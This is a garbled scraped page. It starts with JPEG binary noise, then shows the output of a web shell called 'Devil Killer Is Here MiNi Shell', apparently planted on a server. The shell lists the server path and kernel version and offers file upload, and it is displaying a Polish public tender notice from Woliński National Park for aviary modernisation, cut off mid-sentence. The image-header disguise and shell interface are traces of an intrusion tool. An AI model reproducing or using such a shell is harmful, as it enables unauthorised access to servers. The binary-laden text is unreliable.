JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221012/0038973501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja i remont istniejących wolier oraz wykonanie nowej woliery <br/>na terenie Zagrody Pokazowej Żubrów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Woliński Park Narodowy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 321169472</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grodno 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Międzyzdroje</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48913864953</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@wolinpn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wolinpn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ochrona przyrody </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja i remont istniejących wolier oraz wykonanie nowej woliery <br/>na terenie Zagrody Pokazowej Żubrów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-430407c0-4a2b-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00389735</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00350103/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Remont i modernizacja Zagrody Pokazowej Żubrów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-430407c0-4a2b-11ed-9171-f6b7c7d59353 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-430407c0-4a2b-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja odbywa się przy użyciu<br/>Platformy e-Zamówienia: https://ezamowienia.gov.pl.<br/>2. Zamawiający wyznacza do kontaktu z Wykonawcami Konrada Wrzecionkowskiego tel. 913864975, e-mail: sekretariat@wolinpn.pl<br/>3. Zamawiający przekazuje link do postępowania oraz ID postępowania jako Załącznik nr 8 do SWZ.<br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia („Przeglądaj postępowania/konkursy&#34;).<br/>4. Wykonawca musi posiadać konto podmiotu „Wykonawca&#34; na Platformie e-Zamówienia.<br/>5. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>6. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie (Dz. U. poz. 2452),<br/>zwanym dalej<br/>„rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych&#34;,<br/>7. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia<br/>Rady Ministrów z dnia 12 kwietnia<br/>2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2017 r. poz. 2247), zwanym dalej<br/>„rozporządzeniem Rady Ministrów w sprawie Krajowych Ram Interoperacyjności&#34;, z uwzględnieniem rodzaju<br/>przekazywanych danych i przekazuje się jako załączniki.<br/>8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>1) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności i<br/>przekazuje się jako załącznik, lub<br/>2) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków<br/>komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji&#34;).<br/>9. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze do komunikacji&#34;, w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi.<br/>10.Szczegółowe zasady komunikacji opisane są w SWZ.<br/>11. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji&#34; w pełnym zakresie wymaga posiadania konta Wykonawcy<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji&#34;<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>12. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji&#34; wynosi 150 MB.<br/>13. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>14. Wsparcie techniczne Platformy e-Zamówienia: (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie<br/>internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że: administratorem Pani/Pana danych osobowych jest Woliński Park<br/>Narodowy z siedzibą w Międzyzdrojach, Grodno 1, 72-500 Międzyzdroje. Administrator wyznaczył Inspektora Danych Osobowych, z<br/>którym można się kontaktować z uwzględnieniem następujących danych teleadresowych: p. Ireneusz Domagała, e-mail:<br/>iod@wolinpn.pl,<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przeprowadzeniem<br/>postępowania o udzielenie zamówienia publicznego,<br/>3) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy PZP,<br/>4) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy,<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy PZP, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP,<br/>6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO,<br/>7) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać<br/>Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia),<br/>b) na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych (skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może naruszać integralności protokołu postępowania oraz jego załączników, nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w<br/>zakresie niezgodnym z ustawą),<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo<br/>do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania<br/>ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego),<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>8) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO.<br/>9) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora; organem właściwym dla przedmiotowej skargi jest Prezes Urzędu Ochrony Danych Osobowych, ul.<br/>Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">37-41-1/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane dotyczące modernizacji i remontu istniejących wolier oraz wykonanie nowej<br/>woliery na terenie Zagrody Pokazowej Żubrów.<br/>• dla części I: Modernizacja wolier dla ptaków<br/>Zadanie polegające na wykonaniu modernizacji wolier dla ptaków dzielące się na dwa podzadania:<br/>Podzadanie A<br/>Modernizacja części nadziemnej w pawilonie — wymiana istniejących elementów (drewniane przegrodzenia i siatka) na<br/>elementy metalowe złożone z ram z profilu 25x25x2 mm wypełnionego siatką zgrzewaną cynkowaną typu weld-mesh<br/>grubości 3 mm, rozmiar oczka siatki 30x30 mm i zwiększonej wytrzymałości (umożliwiającej przetrzymanie drapieżnika typu wilk, ryś itp.) - ściany zewnętrzne. W całej konstrukcji trzy przegrodzenia z drzwiami przepustowymi. Wymiary ogólne<br/>woliery: wysokość - 3 m, powierzchnia - 23,6x4 m. (jako wzorcowe parametry wytrzymałości Zamawiający przyjął siatki typu esafort cavacorta)<br/>Podzadanie B<br/>Modernizacja ściany drewnianej w wolierze ekspozycyjnej dla bielików wraz z śluzą wejściową z zadaszeniem. Orientacyjne<br/>wymiary ściany 10x4,5 m wyposażona w minimum 2 półki dla ptaków. W ścianie wmontowana śluza wejściowa z<br/>zadaszeniem, orientacyjne wymiary śluzy lx1,5x2 m. Słupy nośne pozostają całej konstrukcji pozostają. Do słupów możliwy<br/>montaż konstrukcji aluminiowej 80x40x2 mm z ramkami profilu aluminiowego 25x25x2 mm. Ramki wykonane z profili<br/>aluminiowych, wypełnienie siatką zgrzewaną cynkowaną o wymiarach 25x25x1,7 mm (jako wzorcowe parametry<br/>wytrzymałości Zamawiający przyjął esafort cavacorta), deskowanie z deski — modrzew syberyjski klasa AB.<br/>• dla części II: Wykonanie modernizacji woliery wydry<br/>Zadanie polegające na wykonaniu modernizacji woliery wydry poprzez wymianę części nadziemnej wybiegu (ogrodzenie) i<br/>posadowienie w tym samym miejscu nowego ogrodzenia ze śluzą przy wyjściu. Wybieg wykonany z profili aluminiowych<br/>25x25x2 mm, wypełnienie siatką zgrzewaną 19x19x1,4 mm (jako wzorcowe parametry wytrzymałości<br/>Zamawiający przyjął esafort cavacorta). Wybieg zabezpieczony pastuchem elektrycznym.<br/>Orientacyjne wymiary: wysokość - 2,2 m, powierzchnia 10x8,2 m. Zwieńczenie wybiegu w górnej części aluminiowa belka<br/>stabilizująca i usztywniająca całość konstrukcji. Wybieg wyposażony w schronienie/a dla wydry zapewniające możliwość jej<br/>przezimowania.<br/>Przewidywana obsada: 1-2 osobnik/i wydry.<br/>• dla części II: Budowa woliery dla ptaków<br/>Zadanie polegające na kompleksowym zaprojektowaniu i wybudowaniu nowej woliery dla ptaków drapieżnych (np.<br/>myszołów, sowy) o powierzchni do 35 m2 (na planie prostokąta) i wysokości około 3 m. Zadaszenie z poliwęglanu dymionego o powierzchni 7-8 m2. Śluzą wejściową ok.1 x 1 m i wysokości 2 m z zadaszeniem z poliwęglanu dymionego.<br/>Woliera wykonana w technologii ramek aluminiowych wykonanych z profilu aluminiowego o wymiarach 25x25x2 mm<br/>wypełnionego siatką zgrzewaną 25x25x1,75mm (jako wzorcowe parametry wytrzymałości Zamawiający przyjął esafort<br/>cavacorta). Woliera montowana do<br/>obrzeży chodnikowych. Teren przeznaczony pod budowę woliery — podrost drzew liściastych, z lekkim nachyleniem terenu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45342000-6 - Wznoszenie ogrodzeń</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45341000-9 - Wznoszenie płotów</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45421140-7 - Instalowanie stolarki metalowej, z wyjątkiem drzwi i okien</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej z części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) Cena brutto — waga kryterium 60%,<br/>2) Okres gwarancji — waga kryterium 40%.<br/>Ocena ofert zostanie dokonana osobno dla każdej części.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na zasadach określonych w<br/>Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) zdolności ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 150 000,00 zł.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie zgodnie z przepisami Prawa budowlanego i<br/>prawidłowo ukończył co najmniej jedną podobną robotę budowlaną o wartości nie mniejszej niż 200 000,00 zł brutto.<br/>Za podobną robotę budowlaną Zamawiający uzna roboty budowlane obejmujące wznoszenie wolier i wybiegów w<br/>konstrukcji aluminiowej, a także inne prace w zakresie zakładania stolarki budowlanej nawiązującej do konstrukcji<br/>metalowych z dodatkiem drewna.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do<br/>warunku dotyczącego zdolności technicznej lub zawodowej nie dopuszcza łącznego spełniania warunku przez<br/>Wykonawców. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać wyłącznie na zdolnościach tych<br/>z Wykonawców,<br/>którzy faktycznie wykonają roboty budowlane objęte zamówieniem (art. 117 ust. 3 ustawy PZP).<br/>4. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne prowadzone przez Wykonawcę przedsięwzięcia gospodarcze, może mieć negatywny<br/>wpływ na realizację zamówienia.<br/>5. Ocena spełniania ww. warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów<br/>złożonych przez Wykonawcę, na zasadzie: SPEŁNIA / NIE SPEŁNIA. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do<br/>oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu z<br/>postępowania oraz spełnianiu warunków udziału w postępowaniu — zgodnie z Załącznikiem nr 2 oraz Załącznikiem nr 9 do 